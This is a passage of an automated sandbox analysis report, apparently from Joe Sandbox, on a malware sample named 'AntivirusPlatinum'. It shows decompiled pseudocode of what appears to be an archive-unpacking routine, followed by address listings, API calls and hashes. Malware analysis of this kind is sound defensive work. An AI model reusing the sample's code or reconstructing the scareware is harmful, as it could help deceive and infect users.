                                                                                                                                                  													E0040E115(_t500, _t549, _v16, 0x3ff);
                                                                                                                                                  													CharToOemA(_v16, _v16);
                                                                                                                                                  												}
                                                                                                                                                  												__eflags =  *_t549;
                                                                                                                                                  												if( *_t549 == 0) {
                                                                                                                                                  													 *(_t561 + 8) =  *(_t561 + 8) & 0x0000fdff;
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  											E00401C42(_t440);
                                                                                                                                                  										}
                                                                                                                                                  									} else {
                                                                                                                                                  										_t552 = ( *(_t561 + 0xa) & 0x0000ffff) - ( *_v12 & 0x0000ffff) - 0x20;
                                                                                                                                                  										__eflags =  *(_t561 + 8) & 0x00000400;
                                                                                                                                                  										if(( *(_t561 + 8) & 0x00000400) != 0) {
                                                                                                                                                  											_t552 = _t552 - 8;
                                                                                                                                                  											__eflags = _t552;
                                                                                                                                                  										}
                                                                                                                                                  										__eflags = _t552;
                                                                                                                                                  										if(_t552 > 0) {
                                                                                                                                                  											_t117 = _t561 + 0xc30; // 0xc30
                                                                                                                                                  											E00401708(_t117, _t552);
                                                                                                                                                  											E00408E4A( &_v56,  *((intOrPtr*)(_t561 + 0xc30)), _t552);
                                                                                                                                                  											_t409 = E0040A4E9(_v16, 0x4122cc);
                                                                                                                                                  											__eflags = _t409;
                                                                                                                                                  											if(_t409 == 0) {
                                                                                                                                                  												 *((intOrPtr*)(_t440 + 0x4640)) = (((( *( *((intOrPtr*)(_t561 + 0xc30)) + 0xb) & 0x000000ff) << 8) + ( *( *((intOrPtr*)(_t561 + 0xc30)) + 0xa) & 0x000000ff) << 8) + ( *(_t410 + 9) & 0x000000ff) << 8) + ( *(_t410 + 8) & 0x000000ff);
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  									__eflags =  *(_t561 + 8) & 0x00000400;
                                                                                                                                                  									if(( *(_t561 + 8) & 0x00000400) != 0) {
                                                                                                                                                  										_t147 = _t561 + 0xc3c; // 0xc3c
                                                                                                                                                  										E00408E4A( &_v56, _t147, 8);
                                                                                                                                                  									}
                                                                                                                                                  									_t150 = _t561 + 0xc44; // 0xc44
                                                                                                                                                  									E0040DEF9(_t150,  *_v60);
                                                                                                                                                  									 *((intOrPtr*)(_t561 + 0xc68)) = 0;
                                                                                                                                                  									 *((intOrPtr*)(_t561 + 0xc8c)) = 0;
                                                                                                                                                  									 *((intOrPtr*)(_t561 + 0xcb0)) = 0;
                                                                                                                                                  									__eflags =  *(_t561 + 8) & 0x00001000;
                                                                                                                                                  									if(( *(_t561 + 8) & 0x00001000) == 0) {
                                                                                                                                                  										L70:
                                                                                                                                                  										 *((intOrPtr*)(_t440 + 0x6d80)) =  *((intOrPtr*)(_t440 + 0x6d80)) +  *((intOrPtr*)(_t561 + 0xcd8));
                                                                                                                                                  										asm("adc [ebx+0x6d84], eax");
                                                                                                                                                  										_v68 =  *(_t561 + 8) >> 0x00000003 & 0x00000001;
                                                                                                                                                  										_t358 =  !(E00408E82( &_v56, _v68));
                                                                                                                                                  										 *(_t440 + 0x6d9a) = _t358;
                                                                                                                                                  										__eflags =  *_t561 - _t358;
                                                                                                                                                  										if( *_t561 != _t358) {
                                                                                                                                                  											_t359 = _v24;
                                                                                                                                                  											__eflags =  *((intOrPtr*)(_t359 + 4)) - 0x7a;
                                                                                                                                                  											if( *((intOrPtr*)(_t359 + 4)) == 0x7a) {
                                                                                                                                                  												E0040A5E2(_v16, "- ???");
                                                                                                                                                  											}
                                                                                                                                                  											 *((char*)(_t440 + 0x6d98)) = 1;
                                                                                                                                                  											E0040325C(0x414c7c, 1);
                                                                                                                                                  											_t361 = E0040DBA8(_v16);
                                                                                                                                                  											E0040B2A9(_t440 + 0x17, E004098F7(0x68), _t361);
                                                                                                                                                  											_t571 = _t571 + 0xc;
                                                                                                                                                  										}
                                                                                                                                                  										goto L76;
                                                                                                                                                  									} else {
                                                                                                                                                  										E00408DC6( &_v56,  &_v64);
                                                                                                                                                  										_v84 = _t440 + 0x52ec;
                                                                                                                                                  										_v80 = _t440 + 0x5310;
                                                                                                                                                  										_v76 = _t440 + 0x5334;
                                                                                                                                                  										_v72 = _t440 + 0x5358;
                                                                                                                                                  										_v20 = 0;
                                                                                                                                                  										_v12 = 0xc;
                                                                                                                                                  										do {
                                                                                                                                                  											_t541 =  *(_t570 + _v20 * 4 - 0x50);
                                                                                                                                                  											_t374 = (_v64 & 0x0000ffff) >> _v12;
                                                                                                                                                  											_v68 = _t374;
                                                                                                                                                  											__eflags = _t374 & 0x00000008;
                                                                                                                                                  											if((_t374 & 0x00000008) == 0) {
                                                                                                                                                  												goto L69;
                                                                                                                                                  											}
                                                                                                                                                  											__eflags = _v20;
                                                                                                                                                  											if(_v20 != 0) {
                                                                                                                                                  												E00408E05( &_v56,  &_v60);
                                                                                                                                                  												E0040DEF9(_t541, _v60);
                                                                                                                                                  											}
                                                                                                                                                  											_t488 = 9;
                                                                                                                                                  											_t375 = memcpy( &_v128,  *(_t570 + _v20 * 4 - 0x50), _t488 << 2);
                                                                                                                                                  											_t574 = _t571 + 0xc;
                                                                                                                                                  											__eflags = _t375 & 0x00000004;
                                                                                                                                                  											if((_t375 & 0x00000004) != 0) {
                                                                                                                                                  												_t191 =  &_v108;
                                                                                                                                                  												 *_t191 = _v108 + 1;
                                                                                                                                                  												__eflags =  *_t191;
                                                                                                                                                  											}
                                                                                                                                                  											_v104 = _v104 & 0x00000000;
                                                                                                                                                  											_t563 = 3;
                                                                                                                                                  											_t376 = _t375 & _t563;
                                                                                                                                                  											__eflags = _t376;
                                                                                                                                                  											if(_t376 <= 0) {
                                                                                                                                                  												L68:
                                                                                                                                                  												_t490 = 9;
                                                                                                                                                  												memcpy( *(_t570 + _v20 * 4 - 0x50),  &_v128, _t490 << 2);
                                                                                                                                                  												_t571 = _t574 + 0xc;
                                                                                                                                                  												_t561 = _v24;
                                                                                                                                                  											} else {
                                                                                                                                                  												_t566 = _t563 - _t376 << 3;
                                                                                                                                                  												__eflags = _t566;
                                                                                                                                                  												_t548 = _t376;
                                                                                                                                                  												do {
                                                                                                                                                  													E00408DA4( &_v56,  &_v25);
                                                                                                                                                  													_t382 = (_v25 & 0x000000ff) << _t566;
                                                                                                                                                  													_t566 = _t566 + 8;
                                                                                                                                                  													_v104 = _v104 | _t382;
                                                                                                                                                  													_t548 = _t548 - 1;
                                                                                                                                                  													__eflags = _t548;
                                                                                                                                                  												} while (_t548 != 0);
                                                                                                                                                  												goto L68;
                                                                                                                                                  											}
                                                                                                                                                  											L69:
                                                                                                                                                  											_v20 = _v20 + 1;
                                                                                                                                                  											_v12 = _v12 - 4;
                                                                                                                                                  											__eflags = _v12 - 0xfffffffc;
                                                                                                                                                  										} while (_v12 > 0xfffffffc);
                                                                                                                                                  										goto L70;
                                                                                                                                                  									}
                                                                                                                                                  								}
                                                                                                                                                  								_t514 = _t465 - 6;
                                                                                                                                                  								__eflags = _t514;
                                                                                                                                                  								if(_t514 == 0) {
                                                                                                                                                  									goto L33;
                                                                                                                                                  								} else {
                                                                                                                                                  									__eflags = _t514 == 1;
                                                                                                                                                  									if(_t514 == 1) {
                                                                                                                                                  										asm("movsd");
                                                                                                                                                  										asm("movsd");
                                                                                                                                                  										asm("movsd");
                                                                                                                                                  										_t568 = _t440 + 0x5398;
                                                                                                                                                  										__eflags =  *_t568 & 0x00000002;
                                                                                                                                                  										if(( *_t568 & 0x00000002) != 0) {
                                                                                                                                                  											E00408E05( &_v56, _t440 + 0x539c);
                                                                                                                                                  										}
                                                                                                                                                  										__eflags =  *_t568 & 0x00000008;
                                                                                                                                                  										if(( *_t568 & 0x00000008) != 0) {
                                                                                                                                                  											E00408DC6( &_v56, _t440 + 0x53a0);
                                                                                                                                                  										}
                                                                                                                                                  									} else {
                                                                                                                                                  										__eflags =  *_t533 & 0x00008000;
                                                                                                                                                  										if(( *_t533 & 0x00008000) != 0) {
                                                                                                                                                  											E00408E05( &_v56,  &_v12);
                                                                                                                                                  											 *((intOrPtr*)(_t440 + 0x6d80)) =  *((intOrPtr*)(_t440 + 0x6d80)) + _v12;
                                                                                                                                                  											asm("adc dword [ebx+0x6d84], 0x0");
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  									goto L76;
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  							__eflags =  *_t533 & 0x00000002;
                                                                                                                                                  							if(( *_t533 & 0x00000002) != 0) {
                                                                                                                                                  								goto L19;
                                                                                                                                                  							}
                                                                                                                                                  							goto L22;
                                                                                                                                                  						}
                                                                                                                                                  						L19:
                                                                                                                                                  						_push(6);
                                                                                                                                                  						goto L23;
                                                                                                                                                  					} else {
                                                                                                                                                  						E0040B2A9(_t440 + 0x17, E004098F7(0x68), "???");
                                                                                                                                                  						 *((char*)(_t440 + 0x6d98)) = 1;
                                                                                                                                                  						E0040325C(0x414c7c, 3);
                                                                                                                                                  						goto L6;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_t526 =  *(__ecx + 0x6d7c);
                                                                                                                                                  				_t429 =  *((intOrPtr*)(__ecx + 0x6d94)) + 0x14;
                                                                                                                                                  				asm("adc ecx, ecx");
                                                                                                                                                  				_t578 = _t526;
                                                                                                                                                  				if(_t578 < 0 || _t578 <= 0 &&  *((intOrPtr*)(__ecx + 0x6d78)) < _t429) {
                                                                                                                                                  					goto L10;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t554 = _t440 + 0xe60;
                                                                                                                                                  					_v5 = 1;
                                                                                                                                                  					if(E0040568A(_t440, _t526, _t440 + 0xe60, 8) == 8) {
                                                                                                                                                  						_t432 =  *((intOrPtr*)(_t440 + 0x1390)) + 0x2418;
                                                                                                                                                  						__eflags =  *_t432;
                                                                                                                                                  						if( *_t432 == 0) {
                                                                                                                                                  							_t432 = E00402C96(2, _t440 + 0x17, _t432, 0x80);
                                                                                                                                                  							__eflags = _t432;
                                                                                                                                                  							if(_t432 == 0) {
                                                                                                                                                  								E00404F2E(_t440);
                                                                                                                                                  								_t432 = L0040343E(0x414c7c, _t570, 0xff);
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						__eflags =  *((char*)(_t440 + 0x46a0)) - 0x24;
                                                                                                                                                  						_t569 = _t440 + 0xc20;
                                                                                                                                                  						asm("sbb al, al");
                                                                                                                                                  						__eflags =  *((intOrPtr*)(_t440 + 0x1390)) + 0x2418;
                                                                                                                                                  						E00402DBD(_t569, _t526,  *((intOrPtr*)(_t440 + 0x1390)) + 0x2418, _t554, 0, 0, _t432 + 0x00000001 & 0x000000ff);
                                                                                                                                                  						_v32 = _t569;
                                                                                                                                                  						goto L15;
                                                                                                                                                  					}
                                                                                                                                                  					goto L5;
                                                                                                                                                  				}
                                                                                                                                                  			}





















































































                                                                                                                                                  0x00401ce5
                                                                                                                                                  0x00401ced
                                                                                                                                                  0x00401cf5
                                                                                                                                                  0x00401cf7
                                                                                                                                                  0x00401d00
                                                                                                                                                  0x00401d06
                                                                                                                                                  0x00401d0c
                                                                                                                                                  0x00401d18
                                                                                                                                                  0x00401d72
                                                                                                                                                  0x00401d72
                                                                                                                                                  0x00401de3
                                                                                                                                                  0x00401de8
                                                                                                                                                  0x00401ded
                                                                                                                                                  0x00401df1
                                                                                                                                                  0x00401d56
                                                                                                                                                  0x00401d58
                                                                                                                                                  0x00401d5d
                                                                                                                                                  0x00401d5d
                                                                                                                                                  0x00401d61
                                                                                                                                                  0x00401d61
                                                                                                                                                  0x00401d66
                                                                                                                                                  0x00401d66
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401d6b
                                                                                                                                                  0x00401e01
                                                                                                                                                  0x00401e0d
                                                                                                                                                  0x00401e16
                                                                                                                                                  0x00401e20
                                                                                                                                                  0x00401e26
                                                                                                                                                  0x00401e2b
                                                                                                                                                  0x00401e35
                                                                                                                                                  0x00401e3a
                                                                                                                                                  0x00401e3d
                                                                                                                                                  0x00401e41
                                                                                                                                                  0x00401e74
                                                                                                                                                  0x00401e7a
                                                                                                                                                  0x00401e7d
                                                                                                                                                  0x00401e83
                                                                                                                                                  0x00401e86
                                                                                                                                                  0x00401e8d
                                                                                                                                                  0x00401e90
                                                                                                                                                  0x00401e90
                                                                                                                                                  0x00401e93
                                                                                                                                                  0x00401e94
                                                                                                                                                  0x00401e97
                                                                                                                                                  0x00401e9f
                                                                                                                                                  0x00401ea6
                                                                                                                                                  0x00401eac
                                                                                                                                                  0x00401eb2
                                                                                                                                                  0x00401eba
                                                                                                                                                  0x00401eba
                                                                                                                                                  0x00401ebd
                                                                                                                                                  0x00401ec3
                                                                                                                                                  0x004023ad
                                                                                                                                                  0x004023ae
                                                                                                                                                  0x004023b9
                                                                                                                                                  0x004023ba
                                                                                                                                                  0x004023c9
                                                                                                                                                  0x004023d3
                                                                                                                                                  0x004023da
                                                                                                                                                  0x004023e6
                                                                                                                                                  0x004023e6
                                                                                                                                                  0x004023eb
                                                                                                                                                  0x004023f1
                                                                                                                                                  0x004023f6
                                                                                                                                                  0x004023fa
                                                                                                                                                  0x00402400
                                                                                                                                                  0x00402402
                                                                                                                                                  0x00402409
                                                                                                                                                  0x0040240f
                                                                                                                                                  0x004024c1
                                                                                                                                                  0x004024c7
                                                                                                                                                  0x004024cd
                                                                                                                                                  0x004024fa
                                                                                                                                                  0x004024fa
                                                                                                                                                  0x004024fd
                                                                                                                                                  0x00402500
                                                                                                                                                  0x00402505
                                                                                                                                                  0x00402505
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040250a
                                                                                                                                                  0x004024cf
                                                                                                                                                  0x004024df
                                                                                                                                                  0x004024f0
                                                                                                                                                  0x004024a6
                                                                                                                                                  0x004024ad
                                                                                                                                                  0x004024b4
                                                                                                                                                  0x004024b9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004024b9
                                                                                                                                                  0x004024d7
                                                                                                                                                  0x004024dd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004024dd
                                                                                                                                                  0x0040241b
                                                                                                                                                  0x0040241e
                                                                                                                                                  0x00402424
                                                                                                                                                  0x0040242a
                                                                                                                                                  0x00402431
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00402437
                                                                                                                                                  0x0040243a
                                                                                                                                                  0x0040248a
                                                                                                                                                  0x00402497
                                                                                                                                                  0x004024a1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004024a1
                                                                                                                                                  0x0040243c
                                                                                                                                                  0x00402443
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00402449
                                                                                                                                                  0x00402450
                                                                                                                                                  0x00402455
                                                                                                                                                  0x00402458
                                                                                                                                                  0x00402459
                                                                                                                                                  0x00402459
                                                                                                                                                  0x0040245b
                                                                                                                                                  0x0040245d
                                                                                                                                                  0x0040245e
                                                                                                                                                  0x00402461
                                                                                                                                                  0x00402466
                                                                                                                                                  0x0040246a
                                                                                                                                                  0x0040246c
                                                                                                                                                  0x00402471
                                                                                                                                                  0x00402473
                                                                                                                                                  0x00402475
                                                                                                                                                  0x00402475
                                                                                                                                                  0x00402479
                                                                                                                                                  0x00402479
                                                                                                                                                  0x00402479
                                                                                                                                                  0x0040247f
                                                                                                                                                  0x00402484
                                                                                                                                                  0x00402488
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00402488
                                                                                                                                                  0x00401ec9
                                                                                                                                                  0x00401ec9
                                                                                                                                                  0x00401eca
                                                                                                                                                  0x00401f49
                                                                                                                                                  0x00401f49
                                                                                                                                                  0x00401f4c
                                                                                                                                                  0x00401f52
                                                                                                                                                  0x00401f54
                                                                                                                                                  0x00401f54
                                                                                                                                                  0x00401f62
                                                                                                                                                  0x00401f63
                                                                                                                                                  0x00401f64
                                                                                                                                                  0x00401f6e
                                                                                                                                                  0x00401f6f
                                                                                                                                                  0x00401f72
                                                                                                                                                  0x00401f77
                                                                                                                                                  0x00401f7a
                                                                                                                                                  0x00401f81
                                                                                                                                                  0x00401f84
                                                                                                                                                  0x00401f89
                                                                                                                                                  0x00401f90
                                                                                                                                                  0x00401f95
                                                                                                                                                  0x00401f9c
                                                                                                                                                  0x00401fa1
                                                                                                                                                  0x00401fa8
                                                                                                                                                  0x00401fab
                                                                                                                                                  0x00401fb0
                                                                                                                                                  0x00401fb7
                                                                                                                                                  0x00401fbc
                                                                                                                                                  0x00401fc3
                                                                                                                                                  0x00401fc8
                                                                                                                                                  0x00401fcf
                                                                                                                                                  0x00401fd2
                                                                                                                                                  0x00401fd7
                                                                                                                                                  0x00401fde
                                                                                                                                                  0x00401fe8
                                                                                                                                                  0x00401fe8
                                                                                                                                                  0x00401feb
                                                                                                                                                  0x00401fef
                                                                                                                                                  0x0040200b
                                                                                                                                                  0x0040200e
                                                                                                                                                  0x00402011
                                                                                                                                                  0x00402011
                                                                                                                                                  0x00402014
                                                                                                                                                  0x00402017
                                                                                                                                                  0x0040201a
                                                                                                                                                  0x0040201d
                                                                                                                                                  0x0040201f
                                                                                                                                                  0x00402024
                                                                                                                                                  0x00402026
                                                                                                                                                  0x00402026
                                                                                                                                                  0x00401ff1
                                                                                                                                                  0x00401ff5
                                                                                                                                                  0x00401ffa
                                                                                                                                                  0x00402001
                                                                                                                                                  0x00402004
                                                                                                                                                  0x00402004
                                                                                                                                                  0x00402041
                                                                                                                                                  0x0040204d
                                                                                                                                                  0x0040204f
                                                                                                                                                  0x00402061
                                                                                                                                                  0x0040206a
                                                                                                                                                  0x0040206d
                                                                                                                                                  0x0040206f
                                                                                                                                                  0x00402076
                                                                                                                                                  0x0040207c
                                                                                                                                                  0x0040207f
                                                                                                                                                  0x00402081
                                                                                                                                                  0x00402081
                                                                                                                                                  0x0040208f
                                                                                                                                                  0x0040209f
                                                                                                                                                  0x004020a4
                                                                                                                                                  0x004020ac
                                                                                                                                                  0x004020af
                                                                                                                                                  0x004020b4
                                                                                                                                                  0x004020b7
                                                                                                                                                  0x004020ba
                                                                                                                                                  0x00402147
                                                                                                                                                  0x0040214a
                                                                                                                                                  0x00402155
                                                                                                                                                  0x00402159
                                                                                                                                                  0x004021e2
                                                                                                                                                  0x004021e4
                                                                                                                                                  0x0040215f
                                                                                                                                                  0x00402162
                                                                                                                                                  0x0040216e
                                                                                                                                                  0x00402176
                                                                                                                                                  0x00402179
                                                                                                                                                  0x00402179
                                                                                                                                                  0x0040217f
                                                                                                                                                  0x00402181
                                                                                                                                                  0x004021b6
                                                                                                                                                  0x004021cc
                                                                                                                                                  0x00402183
                                                                                                                                                  0x00402190
                                                                                                                                                  0x0040219e
                                                                                                                                                  0x004021a9
                                                                                                                                                  0x004021a9
                                                                                                                                                  0x004021d1
                                                                                                                                                  0x004021d5
                                                                                                                                                  0x004021dc
                                                                                                                                                  0x004021dc
                                                                                                                                                  0x004021d5
                                                                                                                                                  0x004021ed
                                                                                                                                                  0x004021ed
                                                                                                                                                  0x004020c0
                                                                                                                                                  0x004020d1
                                                                                                                                                  0x004020d4
                                                                                                                                                  0x004020d8
                                                                                                                                                  0x004020da
                                                                                                                                                  0x004020da
                                                                                                                                                  0x004020da
                                                                                                                                                  0x004020dd
                                                                                                                                                  0x004020df
                                                                                                                                                  0x004020e5
                                                                                                                                                  0x004020ec
                                                                                                                                                  0x004020fb
                                                                                                                                                  0x00402108
                                                                                                                                                  0x0040210d
                                                                                                                                                  0x0040210f
                                                                                                                                                  0x0040213c
                                                                                                                                                  0x0040213c
                                                                                                                                                  0x0040210f
                                                                                                                                                  0x004020df
                                                                                                                                                  0x004021f7
                                                                                                                                                  0x004021fb
                                                                                                                                                  0x004021ff
                                                                                                                                                  0x00402209
                                                                                                                                                  0x00402209
                                                                                                                                                  0x00402213
                                                                                                                                                  0x00402219
                                                                                                                                                  0x00402225
                                                                                                                                                  0x0040222b
                                                                                                                                                  0x00402231
                                                                                                                                                  0x00402237
                                                                                                                                                  0x0040223b
                                                                                                                                                  0x00402319
                                                                                                                                                  0x0040231f
                                                                                                                                                  0x0040232e
                                                                                                                                                  0x0040233c
                                                                                                                                                  0x00402347
                                                                                                                                                  0x00402349
                                                                                                                                                  0x00402350
                                                                                                                                                  0x00402353
                                                                                                                                                  0x00402359
                                                                                                                                                  0x0040235c
                                                                                                                                                  0x00402360
                                                                                                                                                  0x0040236a
                                                                                                                                                  0x0040236a
                                                                                                                                                  0x00402376
                                                                                                                                                  0x0040237d
                                                                                                                                                  0x00402385
                                                                                                                                                  0x00402397
                                                                                                                                                  0x0040239c
                                                                                                                                                  0x0040239c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00402241
                                                                                                                                                  0x00402248
                                                                                                                                                  0x00402253
                                                                                                                                                  0x0040225c
                                                                                                                                                  0x00402265
                                                                                                                                                  0x0040226e
                                                                                                                                                  0x00402271
                                                                                                                                                  0x00402274
                                                                                                                                                  0x0040227b
                                                                                                                                                  0x0040227e
                                                                                                                                                  0x00402289
                                                                                                                                                  0x0040228b
                                                                                                                                                  0x0040228e
                                                                                                                                                  0x00402290
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00402292
                                                                                                                                                  0x00402296
                                                                                                                                                  0x0040229f
                                                                                                                                                  0x004022a9
                                                                                                                                                  0x004022ae
                                                                                                                                                  0x004022ba
                                                                                                                                                  0x004022be
                                                                                                                                                  0x004022be
                                                                                                                                                  0x004022c0
                                                                                                                                                  0x004022c2
                                                                                                                                                  0x004022c4
                                                                                                                                                  0x004022c4
                                                                                                                                                  0x004022c4
                                                                                                                                                  0x004022c4
                                                                                                                                                  0x004022c7
                                                                                                                                                  0x004022cd
                                                                                                                                                  0x004022ce
                                                                                                                                                  0x004022ce
                                                                                                                                                  0x004022d0
                                                                                                                                                  0x004022f6
                                                                                                                                                  0x004022ff
                                                                                                                                                  0x00402303
                                                                                                                                                  0x00402303
                                                                                                                                                  0x00402305
                                                                                                                                                  0x004022d2
                                                                                                                                                  0x004022d4
                                                                                                                                                  0x004022d4
                                                                                                                                                  0x004022d7
                                                                                                                                                  0x004022d9
                                                                                                                                                  0x004022e0
                                                                                                                                                  0x004022eb
                                                                                                                                                  0x004022ed
                                                                                                                                                  0x004022f0
                                                                                                                                                  0x004022f3
                                                                                                                                                  0x004022f3
                                                                                                                                                  0x004022f3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004022d9
                                                                                                                                                  0x00402308
                                                                                                                                                  0x00402308
                                                                                                                                                  0x0040230b
                                                                                                                                                  0x0040230f
                                                                                                                                                  0x0040230f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040227b
                                                                                                                                                  0x0040223b
                                                                                                                                                  0x00401ecc
                                                                                                                                                  0x00401ecc
                                                                                                                                                  0x00401ecf
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401ed1
                                                                                                                                                  0x00401ed1
                                                                                                                                                  0x00401ed2
                                                                                                                                                  0x00401f0f
                                                                                                                                                  0x00401f10
                                                                                                                                                  0x00401f11
                                                                                                                                                  0x00401f12
                                                                                                                                                  0x00401f18
                                                                                                                                                  0x00401f1b
                                                                                                                                                  0x00401f27
                                                                                                                                                  0x00401f27
                                                                                                                                                  0x00401f2c
                                                                                                                                                  0x00401f2f
                                                                                                                                                  0x00401f3f
                                                                                                                                                  0x00401f3f
                                                                                                                                                  0x00401ed4
                                                                                                                                                  0x00401ed9
                                                                                                                                                  0x00401edc
                                                                                                                                                  0x00401ee9
                                                                                                                                                  0x00401ef1
                                                                                                                                                  0x00401ef7
                                                                                                                                                  0x00401ef7
                                                                                                                                                  0x00401edc
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401ed2
                                                                                                                                                  0x00401ecf
                                                                                                                                                  0x00401e88
                                                                                                                                                  0x00401e8b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401e8b
                                                                                                                                                  0x00401e7f
                                                                                                                                                  0x00401e7f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401e43
                                                                                                                                                  0x00401e54
                                                                                                                                                  0x00401e63
                                                                                                                                                  0x00401e6a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401e6a
                                                                                                                                                  0x00401e41
                                                                                                                                                  0x00401d20
                                                                                                                                                  0x00401d28
                                                                                                                                                  0x00401d2b
                                                                                                                                                  0x00401d2d
                                                                                                                                                  0x00401d2f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401d3d
                                                                                                                                                  0x00401d3f
                                                                                                                                                  0x00401d48
                                                                                                                                                  0x00401d54
                                                                                                                                                  0x00401d7e
                                                                                                                                                  0x00401d83
                                                                                                                                                  0x00401d86
                                                                                                                                                  0x00401d94
                                                                                                                                                  0x00401d99
                                                                                                                                                  0x00401d9b
                                                                                                                                                  0x00401d9f
                                                                                                                                                  0x00401dae
                                                                                                                                                  0x00401dae
                                                                                                                                                  0x00401d9b
                                                                                                                                                  0x00401db3
                                                                                                                                                  0x00401dba
                                                                                                                                                  0x00401dc0
                                                                                                                                                  0x00401dd3
                                                                                                                                                  0x00401ddb
                                                                                                                                                  0x00401de0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401de0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401d54

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00404FDC: SetFilePointer.KERNELBASE(00020000,00000000,00000000,00000001,?,?,?,?,0040A7FA,?,?,0040555D,?,?), ref: 00404FF3
                                                                                                                                                    • Part of subcall function 00404FDC: GetLastError.KERNEL32(?,0040A7FA,?,?,0040555D,?,?), ref: 00405000
                                                                                                                                                    • Part of subcall function 0040E115: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000,00000000,?,?,00405198,?,?,01000000,?), ref: 0040E12F
                                                                                                                                                  • CharToOemA.USER32 ref: 004021A9
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Char$ByteErrorFileLastMultiPointerWide
                                                                                                                                                  • String ID: - ???$???$|LA$|LA$|LA$|LA
                                                                                                                                                  • API String ID: 1784729808-3627379113
                                                                                                                                                  • Opcode ID: 537e6f83efcbe7b9c19135e0ebbc041a8dda03950bca739d7956154691084701
                                                                                                                                                  • Instruction ID: d3ae9a043b2c9d79d016dc6309aa3c7e2dade4953754a766d4f739c7a40d4fc9
                                                                                                                                                  • Opcode Fuzzy Hash: 537e6f83efcbe7b9c19135e0ebbc041a8dda03950bca739d7956154691084701
                                                                                                                                                  • Instruction Fuzzy Hash: 9132E1719002049BDF11DFA5C985AEE77BABF40304F14057FE946BB2D2EB786A44CB68
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
